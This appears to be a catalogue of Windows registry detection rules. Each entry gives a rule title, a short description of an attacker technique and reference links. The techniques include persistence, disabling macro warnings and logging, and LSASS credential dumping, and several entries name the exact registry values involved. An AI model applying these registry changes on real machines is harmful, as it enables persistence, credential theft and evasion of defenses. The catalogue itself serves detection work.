Persistence Via Disk Cleanup Handler - Autorun Detects when an attacker modifies values of the Disk Cleanup Handler in the registry to achieve persistence via autorun. The disk cleanup manager is part of the operating system. It displays the dialog box […] The user has the option of enabling or disabling individual handlers by selecting or clearing their check box in the disk cleanup manager's UI. Although Windows comes with a number of disk cleanup handlers, they aren't designed to handle files produced by other applications. Instead, the disk cleanup manager is designed to be flexible and extensible by enabling any developer to implement and register their own disk cleanup handler. Any developer can extend the available disk cleanup services by implementing and registering a disk cleanup handler. https://persistence-info.github.io/Data/diskcleanuphandler.html, https://www.hexacorn.com/blog/2018/09/02/beyond-good-ol-run-key-part-86/
DNS-over-HTTPS Enabled by Registry Detects when a user enables DNS-over-HTTPS. This can be used to hide internet activity or be used to hide the process of exfiltrating data. With this enabled organization will lose visibility into data such as query type, response and originating IP that are used to determine bad actors. https://www.tenforums.com/tutorials/151318-how-enable-disable-dns-over-https-doh-microsoft-edge.html, https://github.com/elastic/detection-rules/issues/1371, https://chromeenterprise.google/policies/?policy=DnsOverHttpsMode, https://admx.help/HKLM/Software/Policies/Mozilla/Firefox/DNSOverHTTPS
New DNS ServerLevelPluginDll Installed Detects the installation of a DNS plugin DLL via ServerLevelPluginDll parameter in registry, which can be used to execute code in context of the DNS server (restart required) https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83, https://blog.3or.de/hunting-dns-server-level-plugin-dll-injection.html
ETW Logging Disabled In .NET Processes - Sysmon Registry Potential adversaries stopping ETW providers recording loaded .NET assemblies. https://twitter.com/_xpn_/status/1268712093928378368, https://social.msdn.microsoft.com/Forums/vstudio/en-US/0878832e-39d7-4eaf-8e16-a729c4c40975/what-can-i-use-e13c0d23ccbc4e12931bd9cc2eee27e4-for?forum=clr, https://github.com/dotnet/runtime/blob/ee2355c801d892f2894b0f7b14a20e6cc50e0e54/docs/design/coreclr/jit/viewing-jit-dumps.md#setting-configuration-variables, https://github.com/dotnet/runtime/blob/f62e93416a1799aecc6b0947adad55a0d9870732/src/coreclr/src/inc/clrconfigvalues.h#L35-L38, https://github.com/dotnet/runtime/blob/7abe42dc1123722ed385218268bb9fe04556e3d3/src/coreclr/src/inc/clrconfig.h#L33-L39, https://github.com/dotnet/runtime/search?p=1&q=COMPlus_&unscoped_q=COMPlus_, https://bunnyinside.com/?term=f71e8cb9c76a, http://managed670.rssing.com/chan-5590147/all_p1.html, https://github.com/dotnet/runtime/blob/4f9ae42d861fcb4be2fcd5d3d55d5f227d30e723/docs/coding-guidelines/clr-jit-coding-conventions.md#1412-disabling-code, https://blog.xpnsec.com/hiding-your-dotnet-complus-etwenabled/, https://i.blackhat.com/EU-21/Wednesday/EU-21-Teodorescu-Veni-No-Vidi-No-Vici-Attacks-On-ETW-Blind-EDRs.pdf
Directory Service Restore Mode(DSRM) Registry Value Tampering Detects changes to "DsrmAdminLogonBehavior" registry value. During a Domain Controller (DC) promotion, administrators create a Directory Services Restore Mode (DSRM) local administrator account with a password that rarely changes. The DSRM account is an “Administrator” account that logs in with the DSRM mode when the server is booting up to restore AD backups or recover the server from a failure. Attackers could abuse DSRM account to maintain their persistence and access to the organization's Active Directory. If the "DsrmAdminLogonBehavior" value is set to "0", the administrator account can only be used if the DC starts in DSRM. If the "DsrmAdminLogonBehavior" value is set to "1", the administrator account can only be used if the local AD DS service is stopped. If the "DsrmAdminLogonBehavior" value is set to "2", the administrator account can always be used. https://adsecurity.org/?p=1785, https://www.sentinelone.com/blog/detecting-dsrm-account-misconfigurations/, https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/dsrm-credentials
Periodic Backup For System Registry Hives Enabled Detects the enabling of the "EnablePeriodicBackup" registry value. Once enabled, The OS will backup System registry hives on restarts to the "C:\Windows\System32\config\RegBack" folder. Windows creates a "RegIdleBackup" task to manage subsequent backups. Registry backup was a default behavior on Windows and was disabled as of "Windows 10, version 1803". https://learn.microsoft.com/en-us/troubleshoot/windows-client/installing-updates-features-roles/system-registry-no-backed-up-regback-folder
Windows Recall Feature Enabled - Registry Detects the enabling of the Windows Recall feature via registry manipulation. Windows Recall can be enabled by setting the value of "DisableAIDataAnalysis" to "0". Adversaries may enable Windows Recall as part of post-exploitation discovery and collection activities. This rule assumes that Recall is already explicitly disabled on the host, and subsequently enabled by the adversary. https://learn.microsoft.com/en-us/windows/client-management/manage-recall, https://learn.microsoft.com/en-us/windows/client-management/mdm/policy-csp-windowsai#disableaidataanalysis
Enabling COR Profiler Environment Variables Detects .NET Framework CLR and .NET Core CLR "cor_enable_profiling" and "cor_profiler" variables being set and configured. https://twitter.com/jamieantisocial/status/1304520651248668673, https://www.slideshare.net/JamieWilliams130/started-from-the-bottom-exploiting-data-sources-to-uncover-attck-behaviors, https://www.sans.org/cyber-security-summit/archives, https://learn.microsoft.com/en-us/dotnet/core/runtime-config/debugging-profiling
Potential EventLog File Location Tampering Detects tampering with EventLog service "file" key. In order to change the default location of an Evtx file. This technique is used to tamper with log collection and alerting https://learn.microsoft.com/en-us/windows/win32/eventlog/eventlog-key
Scripted Diagnostics Turn Off Check Enabled - Registry Detects enabling TurnOffCheck which can be used to bypass defense of MSDT Follina vulnerability https://twitter.com/wdormann/status/1537075968568877057?s=20&t=0lr18OAnmAGoGpma6grLUw
Suspicious Application Allowed Through Exploit Guard Detects applications being added to the "allowed applications" list of exploit guard in order to bypass controlled folder settings https://www.microsoft.com/security/blog/2017/10/23/windows-defender-exploit-guard-reduce-the-attack-surface-against-next-generation-malware/
Change User Account Associated with the FAX Service Detect change of the user account associated with the FAX service to avoid the escalation problem. https://twitter.com/dottor_morte/status/1544652325570191361, https://raw.githubusercontent.com/RiccardoAncarani/talks/master/F-Secure/unorthodox-lateral-movement.pdf
Change the Fax Dll Detect possible persistence using Fax DLL load when service restart https://twitter.com/dottor_morte/status/1544652325570191361, https://raw.githubusercontent.com/RiccardoAncarani/talks/master/F-Secure/unorthodox-lateral-movement.pdf
New File Association Using Exefile Detects the abuse of the exefile handler in new file association. Used for bypass of security products. https://twitter.com/mrd0x/status/1461041276514623491
Add Debugger Entry To Hangs Key For Persistence Detects when an attacker adds a new "Debugger" value to the "Hangs" key in order to achieve persistence which will get invoked when an application crashes https://persistence-info.github.io/Data/wer_debugger.html, https://www.hexacorn.com/blog/2019/09/20/beyond-good-ol-run-key-part-116/
Persistence Via Hhctrl.ocx Detects when an attacker modifies the registry value of the "hhctrl" to point to a custom binary https://persistence-info.github.io/Data/hhctrl.html, https://www.hexacorn.com/blog/2018/04/23/beyond-good-ol-run-key-part-77/
Registry Modification to Hidden File Extension Hides the file extension through modification of the registry https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-1---modify-registry-of-current-user-profile---cmd, https://unit42.paloaltonetworks.com/ransomware-families/, https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?name=TrojanSpy%3aMSIL%2fHakey.A
Displaying Hidden Files Feature Disabled Detects modifications to the "Hidden" and "ShowSuperHidden" explorer registry values in order to disable showing of hidden files and system files. This technique is abused by several malware families to hide their files from normal users. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.001/T1564.001.md#atomic-test-8---hide-files-through-registry
Registry Hide Function from User Detects registry modifications that hide internal tools or functions from the user (malware like Agent Tesla, Hermetic Wiper uses this technique) https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.001/T1564.001.md
Hide Schedule Task Via Index Value Tamper Detects when the "index" value of a scheduled task is modified from the registry Which effectively hides it from any tooling such as "schtasks /query" (Read the referenced link for more information about the effects of this technique) https://blog.qualys.com/vulnerabilities-threat-research/2022/06/20/defending-against-scheduled-task-attacks-in-windows-environments
Driver Added To Disallowed Images In HVCI - Registry Detects changes to the "HVCIDisallowedImages" registry value to potentially add a driver to the list, in order to prevent it from loading. https://github.com/yardenshafir/conference_talks/blob/3de1f5d7c02656c35117f067fbff0a219c304b09/OffensiveCon_2023_Your_Mitigations_are_My_Opportunities.pdf, https://x.com/yarden_shafir/status/1822667605175324787
IE ZoneMap Setting Downgraded To MyComputer Zone For HTTP Protocols Detects changes to Internet Explorer's (IE / Windows Internet properties) ZoneMap configuration of the "HTTP" and "HTTPS" protocols to point to the "My Computer" zone. This allows downloaded files from the Internet to be granted the same level of trust as files stored locally. https://twitter.com/M_haggis/status/1699056847154725107, https://twitter.com/JAMESWT_MHT/status/1699042827261391247, https://learn.microsoft.com/en-us/troubleshoot/developer/browsers/security-privacy/ie-security-zones-registry-entries, https://www.virustotal.com/gui/file/339ff720c74dc44265b917b6d3e3ba0411d61f3cd3c328e9a2bae81592c8a6e5/content
Uncommon Extension In Keyboard Layout IME File Registry Value Detects usage of Windows Input Method Editor (IME) keyboard layout feature, which allows an attacker to load a DLL into the process after sending the WM_INPUTLANGCHANGEREQUEST message. Before doing this, the client needs to register the DLL in a special registry key that is assumed to implement this keyboard layout. This registry key should store a value named "Ime File" with a DLL path. IMEs are essential for languages that have more characters than can be represented on a standard keyboard, such as Chinese, Japanese, and Korean. https://www.linkedin.com/pulse/guntior-story-advanced-bootkit-doesnt-rely-windows-disk-baranov-wue8e/
Suspicious Path In Keyboard Layout IME File Registry Value Detects usage of Windows Input Method Editor (IME) keyboard layout feature, which allows an attacker to load a DLL into the process after sending the WM_INPUTLANGCHANGEREQUEST message. Before doing this, the client needs to register the DLL in a special registry key that is assumed to implement this keyboard layout. This registry key should store a value named "Ime File" with a DLL path. IMEs are essential for languages that have more characters than can be represented on a standard keyboard, such as Chinese, Japanese, and Korean. https://www.linkedin.com/pulse/guntior-story-advanced-bootkit-doesnt-rely-windows-disk-baranov-wue8e/
New Root or CA or AuthRoot Certificate to Store Detects the addition of new root, CA or AuthRoot certificates to the Windows registry https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.004/T1553.004.md#atomic-test-6---add-root-certificate-to-currentuser-certificate-store, https://posts.specterops.io/code-signing-certificate-cloning-attacks-and-defenses-6f98657fc6ec
Internet Explorer DisableFirstRunCustomize Enabled Detects changes to the Internet Explorer "DisableFirstRunCustomize" value, which prevents Internet Explorer from running the first run wizard the first time a user starts the browser after installing Internet Explorer or Windows. https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/devil-bait/NCSC-MAR-Devil-Bait.pdf, https://unit42.paloaltonetworks.com/operation-ke3chang-resurfaces-with-new-tidepool-malware/, https://admx.help/?Category=InternetExplorer&Policy=Microsoft.Policies.InternetExplorer::NoFirstRunCustomise
Potential Ransomware Activity Using LegalNotice Message Detect changes to the "LegalNoticeCaption" or "LegalNoticeText" registry values where the message set contains keywords often used in ransomware ransom messages https://github.com/redcanaryco/atomic-red-team/blob/5c1e6f1b4fafd01c8d1ece85f510160fc1275fbf/atomics/T1491.001/T1491.001.md
Lolbas OneDriveStandaloneUpdater.exe Proxy Download Detects setting a custom URL for OneDriveStandaloneUpdater.exe to download a file from the Internet without executing any anomalous executables with suspicious arguments. The downloaded file will be in C:\Users\redacted\AppData\Local\Microsoft\OneDrive\StandaloneUpdaterreSignInSettingsConfig.json https://lolbas-project.github.io/lolbas/Binaries/OneDriveStandaloneUpdater/
Lsass Full Dump Request Via DumpType Registry Settings Detects the setting of the "DumpType" registry value to "2" which stands for a "Full Dump". Technique such as LSASS Shtinkering requires this value to be "2" in order to dump LSASS. https://github.com/deepinstinct/Lsass-Shtinkering, https://learn.microsoft.com/en-us/windows/win32/wer/collecting-user-mode-dumps, https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Asaf%20Gilboa%20-%20LSASS%20Shtinkering%20Abusing%20Windows%20Error%20Reporting%20to%20Dump%20LSASS.pdf
RestrictedAdminMode Registry Value Tampering Detects changes to the "DisableRestrictedAdmin" registry value in order to disable or enable RestrictedAdmin mode. RestrictedAdmin mode prevents the transmission of reusable credentials to the remote system to which you connect using Remote Desktop. This prevents your credentials from being harvested during the initial connection process if the remote server has been compromise https://github.com/redcanaryco/atomic-red-team/blob/a8e3cf63e97b973a25903d3df9fd55da6252e564/atomics/T1112/T1112.md, https://social.technet.microsoft.com/wiki/contents/articles/32905.remote-desktop-services-enable-restricted-admin-mode.aspx
Blue Mockingbird - Registry Attempts to detect system changes made by Blue Mockingbird https://redcanary.com/blog/blue-mockingbird-cryptominer/
Potential Persistence Via Netsh Helper DLL - Registry Detects changes to the Netsh registry key to add a new DLL value. This change might be an indication of a potential persistence attempt by adding a malicious Netsh helper https://www.ired.team/offensive-security/persistence/t1128-netsh-helper-dll, https://pentestlab.blog/2019/10/29/persistence-netsh-helper-dll/
New Netsh Helper DLL Registered From A Suspicious Location Detects changes to the Netsh registry key to add a new DLL value that is located on a suspicious location. This change might be an indication of a potential persistence attempt by adding a malicious Netsh helper https://www.ired.team/offensive-security/persistence/t1128-netsh-helper-dll, https://pentestlab.blog/2019/10/29/persistence-netsh-helper-dll/
NET NGenAssemblyUsageLog Registry Key Tamper Detects changes to the NGenAssemblyUsageLog registry key. .NET Usage Log output location can be controlled by setting the NGenAssemblyUsageLog CLR configuration knob in the Registry or by configuring an environment variable (as described in the next section). By simplify specifying an arbitrary value (e.g. fake output location or junk data) for the expected value, a Usage Log file for the .NET execution context will not be created. https://bohops.com/2021/03/16/investigating-net-clr-usage-log-tampering-techniques-for-edr-evasion/
New Application in AppCompat A General detection for a new application in AppCompat. This indicates an application executing for the first time on an endpoint. https://github.com/OTRF/detection-hackathon-apt29/issues/1, https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/1.A.1_DFD6A782-9BDB-4550-AB6B-525E825B095E.md
Potential Credential Dumping Attempt Using New NetworkProvider - REG Detects when an attacker tries to add a new network provider in order to dump clear text credentials, similar to how the NPPSpy tool does it https://learn.microsoft.com/en-us/troubleshoot/windows-client/setup-upgrade-and-drivers/network-provider-settings-removed-in-place-upgrade, https://github.com/gtworek/PSBits/tree/master/PasswordStealing/NPPSpy
New ODBC Driver Registered Detects the registration of a new ODBC driver. https://www.hexacorn.com/blog/2020/08/23/odbcconf-lolbin-trifecta/
Potentially Suspicious ODBC Driver Registered Detects the registration of a new ODBC driver where the driver is located in a potentially suspicious location https://www.hexacorn.com/blog/2020/08/23/odbcconf-lolbin-trifecta/
Microsoft Office Protected View Disabled Detects changes to Microsoft Office protected view registry keys with which the attacker disables this feature. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md, https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/, https://yoroi.company/research/cyber-criminal-espionage-operation-insists-on-italian-manufacturing/, https://admx.help/HKCU/software/policies/microsoft/office/16.0/excel/security/protectedview
Trust Access Disable For VBApplications Detects registry changes to Microsoft Office "AccessVBOM" to a value of "1" which disables trust access for VBA on the victim machine and lets attackers execute malicious macros without any Microsoft Office warnings. https://twitter.com/inversecos/status/1494174785621819397, https://www.mcafee.com/blogs/other-blogs/mcafee-labs/zloader-with-a-new-infection-technique/, https://securelist.com/scarcruft-surveilling-north-korean-defectors-and-human-rights-activists/105074/
Python Function Execution Security Warning Disabled In Excel - Registry Detects changes to the registry value "PythonFunctionWarnings" that would prevent any warnings or alerts from showing when Python functions are about to be executed. Threat actors could run malicious code through the new Microsoft Excel feature that allows Python to run within the spreadsheet. https://support.microsoft.com/en-us/office/data-security-and-python-in-excel-33cc88a4-4a87-485e-9ff9-f35958278327
Enable Microsoft Dynamic Data Exchange Enable Dynamic Data Exchange protocol (DDE) in all supported editions of Microsoft Word or Excel. https://msrc.microsoft.com/update-guide/vulnerability/ADV170021
Potential Persistence Via Outlook LoadMacroProviderOnBoot Setting Detects the modification of Outlook setting "LoadMacroProviderOnBoot" which if enabled allows the automatic loading of any configured VBA project/module https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=53, https://www.linkedin.com/pulse/outlook-backdoor-using-vba-samir-b-/
Outlook Macro Execution Without Warning Setting Enabled Detects the modification of Outlook security setting to allow unprompted execution of macros. https://www.mdsec.co.uk/2020/11/a-fresh-outlook-on-mail-based-persistence/, https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=53
Outlook EnableUnsafeClientMailRules Setting Enabled - Registry Detects an attacker trying to enable the outlook security setting "EnableUnsafeClientMailRules" which allows outlook to run applications or execute macros https://support.microsoft.com/en-us/topic/how-to-control-the-rule-actions-to-start-an-application-or-run-a-macro-in-outlook-2016-and-outlook-2013-e4964b72-173c-959d-5d7b-ead562979048, https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=44
Outlook Security Settings Updated - Registry Detects changes to the registry values related to outlook security settings https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1137/T1137.md, https://learn.microsoft.com/en-us/outlook/troubleshoot/security/information-about-email-security-settings
Uncommon Microsoft Office Trusted Location Added Detects changes to registry keys related to "Trusted Location" of Microsoft Office where the path is set to something uncommon. Attackers might add additional trusted locations to avoid macro security restrictions. Internal Research, https://admx.help/?Category=Office2016&Policy=excel16.Office.Microsoft.Policies.Windows::L_TrustedLoc01
Macro Enabled In A Potentially Suspicious Document Detects registry changes to Office trust records where the path is located in a potentially suspicious location https://twitter.com/inversecos/status/1494174785621819397, Internal Research
Office Macros Warning Disabled Detects registry changes to Microsoft Office "VBAWarning" to a value of "1" which enables the execution of all macros, whether signed or unsigned. https://twitter.com/inversecos/status/1494174785621819397, https://www.mcafee.com/blogs/other-blogs/mcafee-labs/zloader-with-a-new-infection-technique/, https://securelist.com/scarcruft-surveilling-north-korean-defectors-and-human-rights-activists/105074/
MaxMpxCt Registry Value Changed Detects changes to the "MaxMpxCt" registry value. MaxMpxCt specifies the maximum outstanding network requests for the server per client, which is used when negotiating a Server Message Block (SMB) connection with a client. Note if the value is set beyond 125 older Windows 9x clients will fail to negotiate. Ransomware threat actors and operators (specifically BlackCat) were seen increasing this value in order to handle a higher volume of traffic. https://www.huntress.com/blog/blackcat-ransomware-affiliate-ttps, https://securityscorecard.com/research/deep-dive-into-alphv-blackcat-ransomware, https://www.intrinsec.com/alphv-ransomware-gang-analysis/?cn-reloaded=1, https://www.sentinelone.com/labs/blackcat-ransomware-highly-configurable-rust-driven-raas-on-the-prowl-for-victims/
Potential Persistence Using DebugPath Detects potential persistence using Appx DebugPath https://oddvar.moe/2018/09/06/persistence-using-universal-windows-platform-apps-appx/, https://github.com/rootm0s/WinPwnage
Potential Persistence Via AppCompat RegisterAppRestart Layer Detects the setting of the REGISTERAPPRESTART compatibility layer on an application. This compatibility layer allows an application to register for restart using the "RegisterApplicationRestart" API. This can be potentially abused as a persistence mechanism. https://github.com/nasbench/Misc-Research/blob/d114d6a5e0a437d3818e492ef9864367152543e7/Other/Persistence-Via-RegisterAppRestart-Shim.md
Potential Persistence Via App Paths Default Property Detects changes to the "Default" property for keys located in the \Software\Microsoft\Windows\CurrentVersion\App Paths\ registry. Which might be used as a method of persistence The entries found under App Paths are used primarily for the following purposes. First, to map an application's executable file name to that file's fully qualified path. Second, to prepend information to the PATH environment variable on a per-application, per-process basis. https://www.hexacorn.com/blog/2013/01/19/beyond-good-ol-run-key-part-3/, https://learn.microsoft.com/en-us/windows/win32/shell/app-registration
Potential Persistence Via AutodialDLL Detects change the the "AutodialDLL" key which could be used as a persistence method to load custom DLL via the "ws2_32" library https://www.hexacorn.com/blog/2015/01/13/beyond-good-ol-run-key-part-24/, https://persistence-info.github.io/Data/autodialdll.html
Potential Persistence Via CHM Helper DLL Detects when an attacker modifies the registry key "HtmlHelp Author" to achieve persistence https://persistence-info.github.io/Data/htmlhelpauthor.html, https://www.hexacorn.com/blog/2018/04/22/beyond-good-ol-run-key-part-76/
Potential PSFactoryBuffer COM Hijacking Detects changes to the PSFactory COM InProcServer32 registry. This technique was used by RomCom to create persistence storing a malicious DLL. https://blogs.blackberry.com/en/2023/06/romcom-resurfaces-targeting-ukraine, https://strontic.github.io/xcyclopedia/library/clsid_C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6.html, https://www.virustotal.com/gui/file/6d3ab9e729bb03ae8ae3fcd824474c5052a165de6cb4c27334969a542c7b261d/detection, https://www.trendmicro.com/en_us/research/23/e/void-rabisu-s-use-of-romcom-backdoor-shows-a-growing-shift-in-th.html
COM Object Hijacking Via Modification Of Default System CLSID Default Value Detects potential COM object hijacking via modification of default system CLSID. https://www.microsoft.com/security/blog/2022/07/27/untangling-knotweed-european-private-sector-offensive-actor-using-0-day-exploits/ (idea), https://unit42.paloaltonetworks.com/snipbot-romcom-malware-variant/, https://blog.talosintelligence.com/uat-5647-romcom/, https://global.ptsecurity.com/analytics/pt-esc-threat-intelligence/darkhotel-a-cluster-of-groups-united-by-common-techniques, https://threatbook.io/blog/Analysis-of-APT-C-60-Attack-on-South-Korea
Potential Persistence Via Custom Protocol Handler Detects potential persistence activity via the registering of a new custom protocole handlers. While legitimate applications register protocole handlers often times during installation. And attacker can abuse this by setting a custom handler to be used as a persistence mechanism. https://ladydebug.com/blog/2019/06/21/custom-protocol-handler-cph/
Potential Persistence Via Event Viewer Events.asp Detects potential registry persistence technique using the Event Viewer "Events.asp" technique https://twitter.com/nas_bench/status/1626648985824788480, https://admx.help/?Category=Windows_7_2008R2&Policy=Microsoft.Policies.InternetCommunicationManagement::EventViewer_DisableLinks, https://www.hexacorn.com/blog/2019/02/15/beyond-good-ol-run-key-part-103/, https://github.com/redcanaryco/atomic-red-team/blob/f296668303c29d3f4c07e42bdd2b28d8dd6625f9/atomics/T1112/T1112.md
Potential Persistence Via GlobalFlags Detects registry persistence technique using the GlobalFlags and SilentProcessExit keys https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/, https://www.deepinstinct.com/2021/02/16/lsass-memory-dumps-are-stealthier-than-ever-before-part-2/
Modification of IE Registry Settings Detects modification of the registry settings used for Internet Explorer and other Windows components that use these settings. An attacker can abuse this registry key to add a domain to the trusted sites Zone or insert javascript for persistence https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-4---add-domain-to-trusted-sites-zone, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-5---javascript-in-registry
Register New IFiltre For Persistence Detects when an attacker registers a new IFilter for an extension. Microsoft Windows Search uses filters to extract the content of items for inclusion in a full-text index. You can extend Windows Search to index new or proprietary file types by writing filters to extract the content, and property handlers to extract the properties of files. https://persistence-info.github.io/Data/ifilters.html, https://twitter.com/0gtweet/status/1468548924600459267, https://github.com/gtworek/PSBits/tree/master/IFilter, https://github.com/gtworek/PSBits/blob/8d767892f3b17eefa4d0668f5d2df78e844f01d8/IFilter/Dll.cpp#L281-L308
Potential Persistence Via LSA Extensions Detects when an attacker modifies the "REG_MULTI_SZ" value named "Extensions" to include a custom DLL to achieve persistence via lsass. The "Extensions" list contains filenames of DLLs being automatically loaded by lsass.exe. Each DLL has its InitializeLsaExtension() method called after loading. https://persistence-info.github.io/Data/lsaaextension.html, https://twitter.com/0gtweet/status/1476286368385019906
Potential Persistence Via Mpnotify Detects when an attacker register a new SIP provider for persistence and defense evasion https://persistence-info.github.io/Data/mpnotify.html, https://www.youtube.com/watch?v=ggY3srD9dYs&ab_channel=GrzegorzTworek
Potential Persistence Via Excel Add-in - Registry Detect potential persistence via the creation of an excel add-in (XLL) file to make it run automatically when Excel is started. https://github.com/redcanaryco/atomic-red-team/blob/4ae9580a1a8772db87a1b6cdb0d03e5af231e966/atomics/T1137.006/T1137.006.md, https://labs.withsecure.com/publications/add-in-opportunities-for-office-persistence
Potential Persistence Via MyComputer Registry Keys Detects modification to the "Default" value of the "MyComputer" key and subkeys to point to a custom binary that will be launched whenever the associated action is executed (see reference section for example) https://www.hexacorn.com/blog/2017/01/18/beyond-good-ol-run-key-part-55/
Potential Persistence Via TypedPaths Detects modification addition to the 'TypedPaths' key in the user or admin registry from a non standard application. Which might indicate persistence attempt https://twitter.com/dez_/status/1560101453150257154, https://forensafe.com/blogs/typedpaths.html
Potential Persistence Via Outlook Today Page Detects potential persistence activity via outlook today page. An attacker can set a custom page to execute arbitrary code and link to it via the registry values "URL" and "UserDefinedUrl". https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=74, https://trustedsec.com/blog/specula-turning-outlook-into-a-c2-with-one-registry-change
Potential Persistence Via Scrobj.dll COM Hijacking Detect use of scrobj.dll as this DLL looks for the ScriptletURL key to get the location of the script to execute https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1546.015/T1546.015.md
Potential WerFault ReflectDebugger Registry Value Abuse Detects potential WerFault "ReflectDebugger" registry value abuse for persistence. https://cocomelonc.github.io/malware/2022/11/02/malware-pers-18.html, https://www.hexacorn.com/blog/2018/08/31/beyond-good-ol-run-key-part-85/
Potential Persistence Via Visual Studio Tools for Office Detects persistence via Visual Studio Tools for Office (VSTO) add-ins in Office applications. https://twitter.com/_vivami/status/1347925307643355138, https://vanmieghem.io/stealth-outlook-persistence/
Suspicious Shim Database Patching Activity Detects installation of new shim databases that try to patch sections of known processes for potential process injection or persistence. https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/pillowmint-fin7s-monkey-thief/, https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html
PowerShell Script Execution Policy Enabled Detects the enabling of the PowerShell script execution policy. Once enabled, this policy allows scripts to be executed. https://admx.help/?Category=Windows_10_2016&Policy=Microsoft.Policies.PowerShell::EnableScripts
Potential Attachment Manager Settings Associations Tamper Detects tampering with attachment manager settings policies associations to lower the default file type risks (See reference for more information) https://support.microsoft.com/en-us/topic/information-about-the-attachment-manager-in-microsoft-windows-c48a4dcd-8de5-2af5-ee9b-cd795ae42738, https://www.virustotal.com/gui/file/2bcd5702a7565952c44075ac6fb946c7780526640d1264f692c7664c02c68465
Potential Persistence Via Outlook Home Page Detects potential persistence activity via outlook home page. An attacker can set a home page to achieve code execution and persistence by editing the WebView registry keys. https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=70, https://support.microsoft.com/en-us/topic/outlook-home-page-feature-is-missing-in-folder-properties-d207edb7-aa02-46c5-b608-5d9dbed9bd04?ui=en-us&rs=en-us&ad=us, https://trustedsec.com/blog/specula-turning-outlook-into-a-c2-with-one-registry-change
Potential Persistence Via DLLPathOverride Detects when an attacker adds a new "DLLPathOverride" value to the "Natural Language" key in order to achieve persistence which will get invoked by "SearchIndexer.exe" process https://persistence-info.github.io/Data/naturallanguage6.html, https://www.hexacorn.com/blog/2018/12/30/beyond-good-ol-run-key-part-98/
Potential Persistence Via Shim Database In Uncommon Location Detects the installation of a new shim database where the file is located in a non-default location https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html, https://andreafortuna.org/2018/11/12/process-injection-and-persistence-using-application-shimming/, https://www.blackhat.com/docs/asia-14/materials/Erickson/Asia-14-Erickson-Persist-It-Using-And-Abusing-Microsofts-Fix-It-Patches.pdf
Potential Attachment Manager Settings Attachments Tamper Detects tampering with attachment manager settings policies attachments (See reference for more information) https://support.microsoft.com/en-us/topic/information-about-the-attachment-manager-in-microsoft-windows-c48a4dcd-8de5-2af5-ee9b-cd795ae42738, https://www.virustotal.com/gui/file/2bcd5702a7565952c44075ac6fb946c7780526640d1264f692c7664c02c68465
PowerShell as a Service in Registry Detects that a powershell code is written to the registry as a service. https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse
Potential Persistence Via Shim Database Modification Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.011/T1546.011.md#atomic-test-3---registry-key-creation-andor-modification-events-for-sdb, https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html, https://andreafortuna.org/2018/11/12/process-injection-and-persistence-using-application-shimming/
Potential PowerShell Execution Policy Tampering Detects changes to the PowerShell execution policy in order to bypass signing requirements for script execution https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.security/set-executionpolicy?view=powershell-7.3
Suspicious Powershell In Registry Run Keys Detects potential PowerShell commands or code within registry run keys https://github.com/frack113/atomic-red-team/blob/a9051c38de8a5320b31c7039efcbd3b56cf2d65a/atomics/T1547.001/T1547.001.md#atomic-test-9---systembc-malware-as-a-service-registry, https://www.trendmicro.com/en_us/research/22/j/lv-ransomware-exploits-proxyshell-in-attack.html
PowerShell Logging Disabled Via Registry Key Tampering Detects changes to the registry for the currently logged-in user. In order to disable PowerShell module logging, script block logging or transcription and script execution logging https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-32---windows-powershell-logging-disabled
